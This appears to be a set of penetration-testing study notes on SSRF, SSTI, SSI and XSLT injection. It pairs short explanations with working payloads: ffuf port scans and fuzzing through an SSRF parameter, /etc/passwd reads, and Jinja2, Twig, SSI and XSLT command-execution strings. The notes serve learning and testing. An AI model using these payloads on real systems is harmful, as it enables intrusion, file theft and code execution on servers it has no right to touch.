Server Side Attacks

From SSRF, SSTI to SSI injections.

Server-side Request Forgery or SSRF

If a server retrieves resources based on user input like an url it can lead to the server making unintended requests. Several URL schemes can be used:

  • http:// and https://: Fetches content via http/s requests leading to acces to internal network.

  • file:// Used to read local files on web server

  • gopher:// Send http posts requests with payloads databases or email.

Look for parameters that passes URL's and try changing those own listener or internal network like http://127.0.0.1/index.php.

Port scan

Based on differences of response of a request we can conduct a port scan. 

ffuf -w ./ports.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-02" -fr "Failed to connect to"

Brute force directories

Look at data in the request -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" . Fuzzing .php pages.

ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"

Local File Inclusion (LFI)

In the data payload use file:// -d "dateserver=file:///etc/passwd&date=2024-01-01"

Blind SSRF

If we cannot see the response and there is a SSRF vulnerbality its called a bilnd SSRF vulnerability. Netcat listener can confirm for a vuln.

Server-side Template Injection or SSTI

SSTI occurs when user input is inserted into the template itself before rendering, allowing code execution.

Like with SQL we can identify vulnerabilities using: 

{{7*7}}
{{7*'7'}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Find payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md

Local File Inclusion (LFI) Jinja2

{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

Remote Code Executino (RCE) Jinja2

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Local File Inclusion (LFI) Twig

{{ "/etc/passwd"|file_excerpt(1,-1) }}

Remote Code Executino (RCE) Twig

{{ ['id'] | filter('system') }}

SSI Injection

Server-Side Includes (SSI) is used by webapps to create dynamic content on HTML pages. The use of SSI can be found if files are used:

  • .shtml

  • .shtm

  • .stm

SSI uses directives consisting of:

  • name: the directive's name

  • parameter name: one or more parameters

  • value: one or more parameter values

Several payloads

<!--#printenv -->
<!--#name param1="value1" param2="value" -->
<!--#exec cmd="whoami" -->

XSLT Injection

eXtensible Stylesheet Language Transformation (XSLT) can select specific nodes from an XML document and change the XML structure.

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />

Last updated

Was this helpful?